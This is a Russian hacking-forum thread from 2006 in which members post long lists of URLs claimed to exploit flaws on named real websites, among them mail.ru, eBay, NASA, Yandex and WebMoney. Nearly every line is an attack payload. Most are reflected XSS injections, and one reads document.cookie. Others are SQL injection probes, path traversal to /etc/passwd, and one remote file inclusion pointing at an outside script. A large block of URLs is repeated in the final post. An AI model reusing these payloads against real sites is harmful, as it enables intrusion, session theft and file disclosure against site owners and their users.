Баги на сайтах.

Discussion in 'Уязвимости' started by D1mOn, 28 Jan 2006.

Thread Status:
Not open for further replies.
  1. back0rifice

    back0rifice Active Member

    Joined:
    16 Mar 2006
    Messages:
    328
    Likes Received:
    107
    Reputations:
    19
    _http://www.astrotop.ru/cgi/rubr.cgi?id=535'
    _http://www.astrotop.ru/cgi/rubr.cgi?id=53,5
    _http://www.docflow.ru/analytic_full.asp?param=3283,4
    _http://www.edu.ru/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=1847(
    _http://www.gelezo.net/comments.php?id=20060322150220'
    _http://www.infosystem.ru/longkurs.php?fid=1123500873655060'
    _http://www.infosystem.ru/longkurs.php?fid=112350087365506,0
    _http://www.internet.news.az/showart.php?id=4541'
    _http://www.ipages.ru/index.php?id=2518'
    _http://www.ipages.ru/index.php?id=2519'
    _http://www.itartass.ur.ru/analit/review/?id=158'
    _http://www.liberal.ru/sitan.asp?Rel=137'
    _http://www.lrn.ru/index.php?module=news&action=thread&newsid=10519'
    _http://www.mka.ru/jet.php
    _http://www.mka.ru/?p=40464'
    _http://www.netlab.ru/News/hotnews/descr1.asp?id=2752'
    _http://www.netlab.ru/News/hotnews/descr1.asp?id=275,2
    _http://www.strana-oz.ru/print.php
    _http://www.strana-oz.ru/print.php?type=article&id=1139'
    _http://www.strana-oz.ru/?numid=26&article=1139'
    _http://www.syrus.ru/index.cgi?Template=all_firms&FirmId=55'
    _http://www.svop.ru/live/arrangements.asp?p_id=624,6
    _http://www.technet.ru/index.php?r=14'
    _http://www.trade.polesye.net/catalog.php?catid=40&id=578'
    _http://www.voenpravo.km.ru/view/view_print.asp?id='
    _http://www.voltairenet.org/mot60.html?lang=ru(
    _http://search.5ballov.ru/search.shtml?cfg=5ballov&query=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&cat=Referats
     
    #141 back0rifice, 23 May 2006
    Last edited: 23 May 2006
    jony, EST a1ien and D1mOn like this.
  2. gLAnce

    gLAnce Elder - Старейшина

    Joined:
    24 Apr 2006
    Messages:
    31
    Likes Received:
    19
    Reputations:
    14
    [Mail.ru]

    http://top.mail.ru/stat?id=8821&what=diff&period="><script>alert("Отсоси%20Майл%20-%20found%20by%20gLAnce")</script>
     
    2 people like this.
  3. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    257
    Likes Received:
    48
    Reputations:
    16
    [Earthlink.Net]

    Code:
    https://fma.myaccount.earthlink.net/fma/register_error.jsp?error=<script>alert('A skolko tut 6`ti znakov mama maya :)')</script>
     
    1 person likes this.
  4. back0rifice

    back0rifice Active Member

    Joined:
    16 Mar 2006
    Messages:
    328
    Likes Received:
    107
    Reputations:
    19
    _http://www.1gb.ru/default.aspx?ti=6&hti=99'
    _http://www.academy.ru/CATALOG/COURSE.ASP?courseID=668'
    _http://www.academy.it.ru/edu/courses.html?cid=1304'
    _http://www.academy.softjoys.ru/courses.php?direction=3&course=56'
    _http://www.academy.softjoys.ru/courses.php?direction=7&course=237'
    _http://all-hack.info/index.php?categoryid=8&p2_articleid=154
    _http://www.articles.org.ru/cfaq/index.php?qid=1427'
    _http://www.asutp.ru/jet.php
    _http://www.asutp.ru/?p=205965'
    _http://www.avalon.ru/ITCourses/Microsoft/Courses/About/?CourseID=118'
    _http://www.biolite.ru/ru/aboutmy/?type=purpose&id=1(
    _http://www.compress.ru/issue.aspx?iid=743'
    _http://www.compress.ru/issue.aspx?iid=74,3
    _http://www.cosmos-stc.ru/?pageId=34'
    _http://www.dialog-21.ru/full_digest.asp?digest_id=55473(
    _http://www.dialog-21.ru/digest.asp?parent_menu_id=947&digest_id=55451(
    _http://www.dkws.org.ua/index.php?page=show&file=a/dev/docs/docum2 обратите внимание на саму строку запроса
    _http://www.docflow.ru/analytic_full.asp?param=3067,2
    _http://www.e-consulting.com.ua/solutions/details.get?id=16'
    _http://www.inno.ru/projects/show/?id=1064'
    _http://www.inno.ru/projects/show/?id=2632(
    _http://www.intertade.ru/price.php?group=10224&type=(
    _http://www.itshop.ru/Level2.asp?Category=8&Firm=0&Type=soft'
    _http://www.leximus.ru/index.php?menu=8'
    _http://www.listsoft.ru/search.php?q=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&section=soft&progs=yes&arts=yes&tips=yes&progname=yes&progdescr=yes&progurl=yes&artname=yes&art=yes&tipname=yes&tip=yes
    _http://www.maik.ru/cgi-bin/list.pl?page=prog(
    _http://oraclub.trecom.tomsk.su/db/web.page?pid=1082'
    _http://www.pmed.ru/conf/index.php?id=13164'
    _http://www.quantumart.ru/news_and_events_new.asp?p_MenuAlias=n2006&p_NewsYear=2006&p_news_id=245,0
    _http://www.rocit.ru/news/shownews.php3?id=9290(
    _http://www.rsci.ru/nko/?action=newsc&id=2851'
    _http://www.un.org/russian/radio/story.asp?NewsID=152'
    _http://www.un.org/russian/radio/story.asp?NewsID=15,2
    _http://www.unixdoc.ru/index.php?mode=2&podmode=1&arcicle_id=29'
    _http://www.unixdoc.ru/index.php?mode=2&podmode=1' !!!LOL!!!
    _http://www.usurt.ru/ru/data/index2.phtml?cat='
    _http://www.usurt.ru/ru/data/index2.phtml?cat=7&id=21'
    _http://www.vseo.ru/viewitems.php?word=782'
    _http://www.veb-master.com/link/poisk.php?poisk=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
    _http://www2.zr.ru/magzr/geta.asp?zr=199903024'
     
    #144 back0rifice, 24 May 2006
    Last edited: 24 May 2006
    1 person likes this.
  5. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,594
    Likes Received:
    976
    Reputations:
    783
    _http://mp3.xss.ru/ На главной странице в поисковик вбивайте <script>alert(/slip/)</script> и всё.
    _http://whois.mazafaka.ru/index.php?domain=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E&go=who%27s+this%3F
    ------------------
    ЗЫ Всё же есть дыры у мазафаки)
     
    #145 .Slip, 24 May 2006
    Last edited: 24 May 2006
    1 person likes this.
  6. degeneration x

    degeneration x Elder - Старейшина

    Joined:
    11 Oct 2005
    Messages:
    96
    Likes Received:
    38
    Reputations:
    21

    http://www.dvd.ru/dvd.phtml?id=%3Cscript%3Ealert();%3C/script%3E56

    http://www.gameauctions.ru/auction/auctiondetails.php?id=100439%3Cscript%3Ealert();%3C/script%3E

    _http://www.isotra.cz/czech/product.php?query=54%27
     
    #146 degeneration x, 24 May 2006
    Last edited by a moderator: 25 May 2006
  7. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,594
    Likes Received:
    976
    Reputations:
    783
    _http://hp.qsrch.com/apps/eps/eps.cgi?prt=hp03&uuid=67b0795864c9d6f84de322f426cc8788&s=%3Cscript%3Ealert%28%2Fslip%2F%29%3C%2Fscript%3E&submit=Go
     
  8. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,594
    Likes Received:
    976
    Reputations:
    783
    ЛОЛ)
    _http://www.intuit.ru/help/
    Там на сайте написано, если вы заметили ошибку выделите и нажмите клавиши .......... и т.д.
    Выделяем любой тескт на странице, нажимаем Ctrl+Enter, выпадает окошко с потверждением об отправке ошибки, нажимаем ОК. Появляется запрос сценария, вбиваем туда: <script>alert(/slip/)</script>
    И успешно появляется алерт, потом сразу же пишет что сообщение отправлено:)
     
    #148 .Slip, 24 May 2006
    Last edited by a moderator: 25 May 2006
    1 person likes this.
  9. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    257
    Likes Received:
    48
    Reputations:
    16
    http://unixbeginner.com/index.php?page=1001&error=%3Cscript%3Ealert(/a1ien/)%3C/script%3E
     
  10. ReFuse

    ReFuse New Member

    Joined:
    21 May 2006
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
    :)
    _http://www.kazan.ru/list/list.php3?
    cid=999+union+select+16,null/*
    _http://bulgarbank.ru/index.php?page=news%27
     
    2 people like this.
  11. ZetRider

    ZetRider Elder - Старейшина

    Joined:
    18 Dec 2004
    Messages:
    38
    Likes Received:
    13
    Reputations:
    4
    http://www.yuretz.ru/prikol.php?id=384\'
    http://forum.farit.ru/calendar.php?s=&action=edit&eventid=14\'
    http://www.naec.ge/?search_string=%22%3E%3Cscript%3Ealert()%3C/script%3E
    http://www.xoxma.od.ua/xoxma/10/473\'
    http://www.koms.ru/forum(page2).php?conf=aa
    http://www.tom-muck.com/blog/master.cfm?searchbox=\"><script>alert()</script>&Submit=Search
    http://www.tom-muck.com/blog/index.cfm?month=12&year=2005&newsmonth=12/1/2005\'
    http://www.webbe.de/index.shtml?CON...RCH="><script>alert()</script>&ASSOCIATION=OR
    http://mobile.optima.ua/bomba.php?c_id=10\'&lim=40\'\"><script>alert()</script>
    http://comp-lik.biz/index.php?q=<script>alert()</script>&search_news=1&search_articles=1&search_downloads=1&search_links=1&search_faq=1&search_gallery=1&search_static=1&p=query&area=1
    http://comp-lik.biz/index.php?categ=9\'&parent=0&p=downloads&area=1
    http://www.prokredo.ru/ru/library/index.php?q13=&t13=&c13=20\'&show13=materials
    http://card.romanticcollection.ru/toprated.php?page=<script>alert()<script>
    http://blog.msk.ru/login.php?login=<script>alert()</script>&pass=&submit=OK
    http://www.paladins.ru/znaxar.php?free=\"><script>alert(1)</script>&sila1=3\"><script>alert(2)</script>&lovk1=3\"><script>alert(3)</script>&intuiz1=3\"><script>alert(4)</script>&vinos1=12\"><script>alert(5)</script>&intel1=\"><script>alert(6)</script>&mudr1=\"><script>alert(7)</script>&sila2=\"><script>alert(8)</script>&lovk2=\"><script>alert(9)</script>&intuiz2=\"><script>alert(10)</script>&vinos2=\"><script>alert(11)</script>&intel2=\"><script>alert(12)</script>&mudr2=\"><script>alert(13)</script>&flag=2\"><script>alert(14)</script>
    http://horoscopes.rambler.ru/day.html?day=1<script>alert(1)</script>&month=4&year=1965<script>alert(2)</script>
    http://nakarte.rambler.ru/moscow/?query='
    http://www.mebelm.com/search/?q=\'
    http://www.ddd.kursknet.ru/cgi-bin/chat.pl?id=&language=<script>alert()</script>
    http://games.alkar.net/csreg/chpass.php?filled=&account=\"><script>alert()</script>&password=&sendpass=
    http://sofit.com.ua/rus/asearch/0/1/0/?ser_mid=-1&go_search=1&q_search=\"><script>alert()</script>
    http://7000.ru/computers/details.php?id=2\'
    http://www.softportal.com/search.php?search=1&search_string=\"><script>alert()</script>
    http://catalog.begun.ru/?q=\"><script>alert()</script>
    http://cio.iv.ru/search.html в поиске sql пример 666\'
    http://www.3a.kiev.ua/good.php?name=<script>alert()</script>
    http://referat.na5.ru/load.php?id=504948\'
    http://referat.apple-online.ru/index.php?type=diplom_1&id=3478\'
    http://www.mobiteka.ru/melodies/melodies.shtml?artid=27\'
    http://valinfo.ru/testresult.php?idtestgroup=0\'
    http://www.newstrack.ru/newstrack3/portal/news/view/20050414/a/
    http://www.1bb.ru/directory.php?cat=35\'
    http://orsn.rambler.ru/baza/consult/index.php?action=tema&kod=1\"><script>alert()</script>
    http://katz.ws/?q=\"><script>alert()</script>
    http://www.flashmaster.ru/search/index.php?words=\'
    http://www.flashmaster.ru/search/in...=rating&section[]=swf&section[]=forum&page=17
    http://www.ext.ru/?id=7\"><script>alert()</script>
    http://bbcom.ch/index.php?suche_wort=\"><script>alert()</script>
    http://www.igromania.ru/games/?666\'
    http://www.spguwc.h15.ru/gb/index.php?action=viewcomments
    http://search.cstrike.ru/?search=\'
    http://search.gamestone.ru/?search=<script>alert()</script>
    http://3mp3.ru/ru/search/text/?request='><script>alert()</script>&what=all
    http://holidayclub.inprogress.ru/catalog/index.php?flet=\"><script>alert()</script>&Co=4&Re=460
    http://hotels.wia.ru/<script>alert()</script>
    http://encycl.accoona.ru/?word=<script>alert()</script>
    http://www.bioone.org/bioone/?request=<script>alert()</script>
    http://www.openhardware.net/?file=<script>alert()</script>
    http://www.avionicsmagazine.com/cgi...e=../../../../../../../../../../../etc/passwd
    http://www.lamuv.de/cgi-bin/store.cgi?action=gamma&file=../../../../../../../../../../../etc/passwd
    http://alumni.calstatela.edu/docume...e=../../../../../../../../../../../etc/passwd
    http://www.optimize.nl/site/jsp/print.jsp?file=<script>alert()</script>
    http://www.linuxhq.com/perl-bin/search_db?q='style=background:url(javascript:alert());'&qid=4&spp=20
    http://seminar.spylog.ru/?rp=seminars/descr/15\'/
    http://members.yadro.ru/banners/nowstate.php3?vbn_id=-1\'
    http://hw.ru/hi-tech/Login.jsp?login=\'\"><script>alert(1)</script>&password=\'\"><script>alert(2)</script>
    http://www.srb.ru/search-results/?q="><script>alert()</script>&m=all&wm=wrd&ps=10&page=0
    http://www.profits.ru/login.php?w=user&o=login&e=u\'
    http://www.gf.ru/cgi-bin/podftp.cgi?hostname=<script>alert()</script>
    http://smchat.ru/?s=reguser&login=\"><script>alert()</script>
    http://www.film.ru/search.asp?what=...(javascript:alert());"&where=root&mode=medium
    http://www.mtve.com/index.php?Page=2\"><script>alert()</script>
    http://register.logitech.com/index.cfm?validate=1\";</script><script>alert()</script>
    http://www.w3.org/Search/Mail/Publi...type=t&type-index="><script>alert(2)</script>
    http://serial.com/?show=<script>alert()</script>&submit=Search
    http://www.phpbuilder.com/snippet/browse.php?by=cat&cat=1\"style=background:url(javascript:alert());\"
    http://poisk.ru/#\"><script>alert()</script>
    http://an.aport.ru/scripts/template.dll?That=ref&r="><script>alert()</script>&Base=referat&Rt=2
    http://www.sexvideogid.ru/search.php?q="><script>alert()</script>
    http://www.ag.ru/cheats/baldurs_gate_2_throne_of_bhaal/15170\"><script>alert()</script>
    http://catalog.aport.ru/rus/themes.aspx?id=1778\'\"><xz>
    http://multifon.ru/stm/stm_popup.php?pid=54&type=jpg&name=666&url=\"style=background:url(javascript:alert());\"
    http://www.iceberg.ru/services/?id=23\'&parent=0
    http://xxx-dosug.com.ru/gallery-333-7.html
    http://www.footbolka.ru/catalog/index.php?ref=xren'
    http://www.whoistar.com/content/view/55/1'/
    http://narod.yandex.ru/userforum/message.xhtml?owner=[название_форума_жертвы]&message_id=3042605&thread_id=0&nickname=&email=&vari=2<script>alert()</script>
    http://www.allpravo.ru/?id=88&type=0&query='"
    http://www.classis.ru/cgi-bin/links...view=%C4%EE%E1%E0%E2%E8%F2%FC+%EE%F2%E7%FB%E2
    http://www.refer.ru/menu?a=select_add&id="><script>alert()</script>
    http://test.msk.ru/cgi-bin/searchdiplom2.cgi?words=<script>alert()</script>
    http://wwc.ru/index.php?do=search&ss="><script>alert()</script>
    http://www.npj.ru/in/dura-lex-group/by/pvp/42564"%20style=background:url(javascript:alert());"
    http://www.drweb.ru/buy/invoice/?computers=&period=1y&email=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&phone=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&j_address=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&m_address=%22%3E%3Cscript%3Ealert%284%29%3C%2Fscript%3E&org=%22%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&kpp=%22%3E%3Cscript%3Ealert(6)</script>&currency=RUR&act=finish&prodid=01-D
    http://www.multitran.ru/c/m.exe?HL=2&L1=1&L2=2&EXT=0&s="><script>alert()</script>
    http://bugs.php.net/report.php?in[d...[ldesc]=&in[repcode]=&in[expres]=&in[actres]=
    http://www.cafepress.com/cp/search/...>alert()</script>&cfpt2=&copt=&cfpt=&x=26&y=8
    http://www.phpbbhacks.com/searchresults.php?version=2"><script>alert()</script>&query=666&search_type=1&Submit=Go
    http://www.tstyle.ru/price/1001636'
    http://xrout.org/index.php поиск "><script>alert()</script>
    http://www.etegro.com/rus/?module=items&id=22'"&text=1"><script>alert()</script>
    http://www.openet.ru/University.nsf/Index.htm!Open&Menu=VPMain&VPID=965"%20style=background:url(javascript:alert());"
    http://www.cracklab.ru/xxx/ [POST] " style=background:url(javascript:alert());"
    http://www.freedisk.ru/guide.php?cat=11"><script>alert()</script>
    http://www.rabota.ru/search/vacancy/?search='"><script>alert()</script>
    http://www.forum.md/Albums.aspx?soundslike=<xml>
    http://nasa.org/static.asp?search_text="style=background:url(javascript:alert());"&search_source=20
    http://search.nasa.gov/nasasearch/search/search.jsp?nasaInclude=66&start=11"><script>alert()</script>
    http://www.999.md/results.asp?criteria=<script>alert()</script>&lng=1&topic=-1
    http://search.ebay.com/search/search.dll?sofocus=bs&sbrftog=1&fcl=4&from=R10&catref=C12&satitle=fur+trim*&sacat=63862%26catref%3DC6&bs=Search&fsop=1%26fsoo%3D1&fgtp=&a54=-24<script>alert()</script>&a22868=-24&a94=-24&gcs=1110&pfid=1283&reqtype=1&pfmode=1&alist=a54%2Ca55%2Ca22868%2Ca53%2Ca94%2Ca3801&pf_query=fur+trim*&sargn=-1%26saslc%3D2&sadis=200&fpos=94062&sappl=1&ftrt=1&ftrv=1&sabdlo=&sabdhi=&saprclo="><script>alert(5)</script>&saprchi='"><script>alert(/k1b0rg/)</script>
    http://www.diary.ru/interest/?q=%22style=background:url(javascript:alert());"
    http://www.wargames.ru/search.php?query='
    http://www.ccg.ru/sections.php?op=listarticles&secid=285'
    http://www.rolemancer.ru/search.php?query='
    http://rulezzz.dp.ua/fotos/<script>alert()</script>
    http://listsoft.ru/search.php?q='">...l=yes&artname=yes&art=yes&tipname=yes&tip=yes
    http://opengl.net/ поиск "style=background:url(javascript:alert());"
    http://www.eurochat.ru/?go=gal&page=7"><script>alert()</script>
    http://www.netflix.com/MovieDisplay?movieid=70011207<script>alert()</script>&trkid=135437
    http://a9.com/-/search/imageResult?q=666&t=f1263.jpg&ru="style=background:url(javascript:alert(1));&u="style=background:url(javascript:alert(2));&ih=296&iw=425&th=84&tw=122&id=I-RBtbW0cGoJ
    http://megafon.buongiorno.com/megafon/web/russian/index.html где просят номер телефона (+7....)Можно вводить любой код
    http://www.tefal.ru/tefal/magazine/recipe_results.asp?keyword=">%3Cscript%3Ealert%28%29%3C%2Fscript%3E&selectName=&APPLIANCE=&SPECIAL_DIETS=&x=0&y=0
    http://lafox.net/shop/?gid=73'"><script>alert()</script>
    http://www.hacktivist.net/anarchy/index.php?action=search'
    http://www.sexonly.ru/katalog.php?ganr=20'
    http://www.icq.com/icqchat/browse_folder.php?tid=30279";//--></script><script>alert()</script>
    http://www.download.com/3120-20_4-0.html?tag=srch&nid=1&qt=666&tg=dl-2001"><script>alert()</script>
    http://www.osmarket.ru/products/5'
    http://zubov.net/666"%20style=background:url(javascript:alert());".cfm?nft=1&t=5&p=1
    http://drocher.ru/goods_list.php?rubric_id=14"><script>alert()</script>
     
  12. ZetRider

    ZetRider Elder - Старейшина

    Joined:
    18 Dec 2004
    Messages:
    38
    Likes Received:
    13
    Reputations:
    4
    http://www.phrack.org/search/index.php?author=&andor=or&title="%20style=background:url(javascript:alert());"&comment=&submit=submit
    http://www.xakep.ru/local/include/iframe_rateit.asp?filedir=25244"><script>alert()</script>
    http://otdell.bs.by/show.html?words...C%2 Fscript%3E
    http://www.missworld.tv/bio/bio.sps?iBiographyID=51851'
    http://www.latin.ru/cgi-bin/search/odm.pl?search="><script>alert()</script>
    http://yellowpages.rin.ru/cgi-bin/s...ript>&srt=not
    http://www.linuxchile.cl/docs.php?op=ver&id=65'
    http://www.hw.ru/hi-tech/recordUsers1.jsp?login="><script>alert()</script>
    http://www.superq.ru/comments.php?id=82_0_1_0_C"><script>alert()</script>
    http://[любой_сайт_использующий_webmoney_transfer].webmoney.ru/conf/pci_testlink.asp?A=1</xmp><script>alert(1)</script>&b=1<script>alert(2)</script>
    http://xtools.org/"%20style=background:url(javascript:alert());".cfm?nft=1&t=6&p=1
    http://www.pro-hack.ru/tools/ip.html?myname=<script>alert()</script>&ipname=&search=
    http://geo.webmoney.ru/asp/wmobjects_in_moscow.asp?al=0"><script>alert()</script>
    http://zloy.org/news/686'/index.html
    http://www.cyberinfo.ru/cgi-bin/proxy/proxy.cgi?host=<script>alert()</script>&port=8080
    http://skvoznoy.org/news-cat/21'/
    http://www.kkunst.com/kk/print.php?file='
    http://top.voffka.com/search.php?key=<script>alert()</script>&cat=Overall
    http://www.leg.state.fl.us/statutes...g="+style=background:url(javascript:alert());
    http://search.mcc.ac.uk/cgi-bin/htsearch?config=mhn&words="><script>alert()</script>&x=0&y=0
    http://koffiejunk.nl/?file=<script>alert()</script>
    http://www.oil-gas.com.ua/data/rus/showdoc.php?file=<script>alert()</script>
    http://www.frozenlight.de/engine/show.php?file=<script>alert()</script>
    http://www.globalschoolbus.com/tools/tool_page.php?file=\
    http://www.cairchicago.org/ournews.php?file=<script>alert()</script>
    http://chrisken.utacm.org/cksource.php?file=/home/chrisken/www/code/ckSource.php
    http://wwwx.cs.unc.edu/~jsterrel/test/viewsource.php?file=viewsource.php
    http://foreverblue.alsgekken.nl/showdoc.php?file=http://kobeluga.narod.ru/nst.php
    http://www.nesprogramme.org/download.php?file=../../../../../../../../../../../../etc/passwd
    http://www.bissettmags.com.au/cgi-b..../../../../../../../../../../../../etc/passwd
    http://www.frostjedi.com/terra/scripts/graemlin/viewsource.php?file=graemlin.php
    http://www.theater-schwedt.de/index.php?file=../../../../../../../../../../../../etc/passwd&mex=7
    http://beer.km.ru/index.php?file=/etc/passwd
    http://www.bobdev.com/downloadstats.php?File=<script>alert()</script>
    http://www.mercenaries.ru/inf/newcomm.php?type=gallery&nick=%21+%21+%21+MAXIMILIAN+%21+%21+%21"><script>alert()</script>&page=1
    http://voronezh.net/job/read_vac.php?cat=1&limit=&from=20'
    http://www.u-antona.vrn.ru/gallery/showgallery.php?mcats=all&si=&what=allfields&name='&when=&whenterm=
    http://www.terms.ru/search.php?words=<script>alert(document.cookie)</script>
    http://www.ret.ru/getpictspr.jsp?gid=229969'
    http://smi.rambler.ru/main.cgi?action=query<script>alert()</script>&mh=t'&wa=
    http://whois.mazafaka.ru/?domain='&x=0&y=0
    http://chat.vrn.ru/cgi-bin/h_grep.cgi?channel=piligrim&day=&nick=<script>alert()</script>&sub=Find
    http://www.skychat.ru/people/lost.php?PHPSESSID=><script>alert()</script>&NewPassword=1&PasswordHint=1&nick=1&PasswordHint1=1&Password=1&Password2=1
    http://www.skychat.ru/people/lost.php?PHPSESSID=431798c8970a49ca53b92bff38395919&NewPassword=1&PasswordHint=1&nick=<script>alert()</script>&PasswordHint1=1&Password=1&Password2=1
    http://www.skychat.ru/people/form.php?sess=><script>alert()</script>&cid=-1888213412&comp_info=1&comp_info2=1&HTTP_USER_AGENT=1
    http://rcw-team.ru/tools/base64/bas...ydCgnTWF0cml4IGhhcyBhbmQgeW91IScpPC9zY3JpcHQ+
    http://www.aist.ru/search/?action=index&text='&x=32&y=11
    http://www.scoopthis.com/pages/article.cgi?file=../../../../../../../../../../etc/passwd
    http://www.netcat.ru/search/?action=index&text='
    http://www.netcat.ru/search/?action=index&text="><script>alert()</script>&need_url=
    http://mp3plus.ru/artist.php?id=446'&id_jam=0
    http://search.tut.by/?status=1&encoding=1&page=0'&how=rlv&query=666
    http://list.gala.net/?p=1&cid=1"><script>alert()</script>
    http://narod.yandex.ru/cgi-bin/yandmarkup?cluster=4&prog=0x2757571A&HndlQuery=87259504&PageNum=0&g=5&d=0&ag=host&tg=1&q0=1009151392%27%22%3E%3Cscript%3Ealert()%3C/script%3E&p=%27
    http://www.e-mail.ru/fast/register.dll?show=.%3Cscript%3Ealert()%3C/script%3E
    http://rusmuz.ru/m.php?artist=%3Cscript%3Ealert()%3C/script%3E&search=1&search_in=0
    http://www.mp3search.ru/search.html?q=<script language="JavaScript">
    http://shop.updated.com/shoppingSearch.jsp?query=%22%3E%3Cscript%3Ealert()%3C/script%3E
    http://www.7wolf.ru/index.php?content=review&gam_id=6482&cdr_id=8294'
    http://www.7wolf.ru/index.php?nws_date_d=03<script>alert()</script>&nws_date_m=11&nws_date_y=2005&content=news
    http://www.games.ru/cheats/?search="><script>alert()</script>&PSearch=name
    http://www.pages.ru/search.html?text=<script>alert()</script>
    http://www.oszone.net/search.php?searchtext="><script>alert()</script>&send.x=0&send.y=0
    http://severe.ru/index.php?h=10'
    http://accont.ru/modules.php?POSTNU...s=1&bool=AND&stories_cat=&stories_topics=&q='
    http://aromas.ru/forum/search.php?text_poisk='
    http://best-test.ru/index.php?t=display_link_search&having=29&cat=0&sid=516478392'
    http://www.fiona.ru/phprusearch.php?query="><script>alert()</script>
    http://music.mail.ru/news/1846?menu_item=club"%20style%3Dbackground%3Aurl%28JaVaScRiPt%3Aalert%28%29%29%3B
    http://www11.pochta.ru/info.php?mid=agreement&lng=ru"><script>alert()</script>
    http://arcade.icq.com/game.htm?code=110272767&RefId=910"><script>alert()</script>
    http://www.koders.com/?s="><script>alert()</script>&_:btn=Search&_:la=*&_:li=*
    http://linuxcenter.ru/news/2005<textarea>/11
    http://www.video48.ru/search/?search=<script>alert()</script>
    http://mp3rank.ru/shop'/
    http://hotcharts.ru/mp3/mp3.php?id=065110097115116097099105097032038032066101110032077111111100121032045032069118101114121116104105110103032098117114110115&source3=268&source4=65/6596&source8=3/357&source11=9120&source12=118'"><script>alert()</script>
    http://kurepin.ru/?id=113&color=<script>alert()</script>
    http://by.ru/cat.cgi?query="><script>alert()</script>
    http://ishodniki.ru/ilook/search.php?query='style=background:url(JaVaScRiPt:alert());&m=or
    http://www.proshivki.ru/downloads.php?productor=15'&chapter=7&page=1
    http://www.ozon.ru/context/kidworld...ent=%CF%F0%EE%F1%EC%EE%F2%F0%E5%F2%FC#comment
    http://www.rbsearch.ru/search.php?said=rbs_999&qq=<script>alert()</script>
    http://www.nmarket.ru/phone/search/?action=search&mode=string&type=phone&data='
    http://www.888.com/site1/default.htm?page=main&lang=en&S=120871487149920257&OS=120871487149920257"><script>alert()</script>&SR=677164&OSR=677164&flag=No&un=false&ver=java&l=&st=173&bc=123&anid=0&ic=0
    http://www.tutorialized.com/tutorials/Perl-and-CGI/File-Manipulation/1'/1
    http://sfgate.com/cgi-bin/qws/ff/qr?term=<script>alert()</script>&Submit=S
    http://www.tug.org/PSTricks/main.cgi?search=<script>alert()</script>&search=Search
    http://www.asianjournal.com/cgi-bin/view_file.cgi?file=../../../../../../../../../../etc/passwd
    http://www.colorado.edu/ralphie/find/fastfind.cgi?arch=guide&string=<script>alert()</script>&x=0&y=0
    http://img365.imageshack.us/my.php?image=../../../../../../../../../../etc/passwd
    http://mail.yandex.ru/search?text=6...cRipT:alert());&addr=from&all_check=0&folder=[ваш_номер]&folder=[ваш_номер]&folder=[ваш_номер]&do=1
    http://baku.ru/frmpst-text.php?cmm_id=34"><script>alert()</script>&usp_id=0&frm_id=362&frmpst_id=2483783&id=2946020
    http://sources.ru/cgi-bin/sources/search/search.cgi?stpos=0&query=<script>alert()</script>&stype=AND
    http://phpclub.ru/index.php?city="%20style=background:url(JaVaScRiPt:alert());&m=job
    http://nextworld.ru/index.php?login="+style=background:url(javascript:alert()); <<затем нажать на вход
    http://library.dozory.ru/cgi-bin/search.cgi?text=';</script><script>alert()</script>&x=0&y=0
    http://www.pentagon.gov/srch/search...B5E9F39D2&q=666&submit=Search&sort=-pub_date'
    http://www.crh.noaa.gov/ifps/<script>alert()</script>
    http://www.nws.noaa.gov/wwamap/wwatxtget.php?cwa=usa&wwa=flood%20statement<script>alert()</script>
    http://www.tcnet.ru/error.html?err=404&msg=<script>alert()</script>
    http://www.oxigen.ru/redirect.cgi?.<script>alert()</script>
    http://sitecity.ru/badlogin.phtml?message=<script>alert()</script>
    http://www.securitylab.ru/bitrix/redirect.php?event1=extra_article_click&event2=poc&event3=241574&goto=<script>alert()</script>
    http://www.web-hack.ru/tools/nslookup.php?hostname=<script>alert()</script>
    http://find.gl/search.php?qq=<script>alert()</script>&said=&d=1
    http://www.hostpk.net/luke.php?action=explorer&dir=<script>alert()</script>&do=download
    http://capitalcity.combats.ru/enter.pl?login=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&step=2&reminder=%CF%E5%F0%E5%E9%F2%E8+%EA+%F1%EB%E5%E4%F3%FE%F9%E5%EC%F3+%F8%E0%E3%F3123123http://search.cstrike.ru/?search=\'
    http://search.gamestone.ru/?search=<script>alert()</script>
    http://3mp3.ru/ru/search/text/?request='><script>alert()</script>&what=all
    http://holidayclub.inprogress.ru/catalog/index.php?flet=\"><script>alert()</script>&Co=4&Re=460
    http://hotels.wia.ru/<script>alert()</script>
    http://encycl.accoona.ru/?word=<script>alert()</script>
    http://www.bioone.org/bioone/?request=<script>alert()</script>
    http://www.openhardware.net/?file=<script>alert()</script>
    http://www.avionicsmagazine.com/cgi...e=../../../../../../../../../../../etc/passwd
    http://www.lamuv.de/cgi-bin/store.cgi?action=gamma&file=../../../../../../../../../../../etc/passwd
    http://alumni.calstatela.edu/docume...e=../../../../../../../../../../../etc/passwd
    http://www.optimize.nl/site/jsp/print.jsp?file=<script>alert()</script>
    http://www.linuxhq.com/perl-bin/search_db?q='style=background:url(javascript:alert());'&qid=4&spp=20
    http://seminar.spylog.ru/?rp=seminars/descr/15\'/
    http://members.yadro.ru/banners/nowstate.php3?vbn_id=-1\'
    http://hw.ru/hi-tech/Login.jsp?login=\'\"><script>alert(1)</script>&password=\'\"><script>alert(2)</script>
    http://www.srb.ru/search-results/?q="><script>alert()</script>&m=all&wm=wrd&ps=10&page=0
    http://www.profits.ru/login.php?w=user&o=login&e=u\'
    http://www.gf.ru/cgi-bin/podftp.cgi?hostname=<script>alert()</script>
    http://smchat.ru/?s=reguser&login=\"><script>alert()</script>
    http://www.film.ru/search.asp?what=...(javascript:alert());"&where=root&mode=medium
    http://www.mtve.com/index.php?Page=2\"><script>alert()</script>
    http://register.logitech.com/index.cfm?validate=1\";</script><script>alert()</script>
